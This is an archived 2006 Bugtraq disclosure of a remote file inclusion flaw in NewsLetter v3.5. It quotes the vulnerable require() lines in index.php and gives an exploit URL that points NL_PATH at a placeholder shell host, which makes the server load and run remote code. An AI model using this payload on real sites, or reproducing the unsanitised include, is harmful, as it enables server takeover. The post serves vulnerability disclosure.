lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060801131536.22199.qmail@securityfocus.com> Date: 1 Aug 2006 13:15:36 -0000 From: tr_zindan@...fsecurity.org To: bugtraq@...urityfocus.com Subject: NewsLetter v3.5 <= (NL_PATH) Remote File Inclusion Exploit #================================================================= #NewsLetter v3.5 <= (NL_PATH) Remote File Inclusion Exploit #================================================================ # | #Critical Level : Dangerous | # | #Venedor site : http://wolfsecurity.org | # | #Version : 3.5 | # | #================================================================= #Bug in : index.php # #Vlu Code : #-------------------------------- # /** # * Erforderliche Datein einbinden # */ # # require ("$NL_PATH"."inc/config.inc.php"); # require ("$NL_PATH"."inc/engine.inc.php"); # #/** #================================================================= # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/index.php?NL_PATH=http://SHELLURL.COM? # #=============================================================================== #Discoverd By : Tr_ZiNDaN # #Conatact : tr_zindan[at]wolfsecurity.com # #GreetZ : EL_MuHaMMeD CyberWolf By_Macro PAradox Babaygit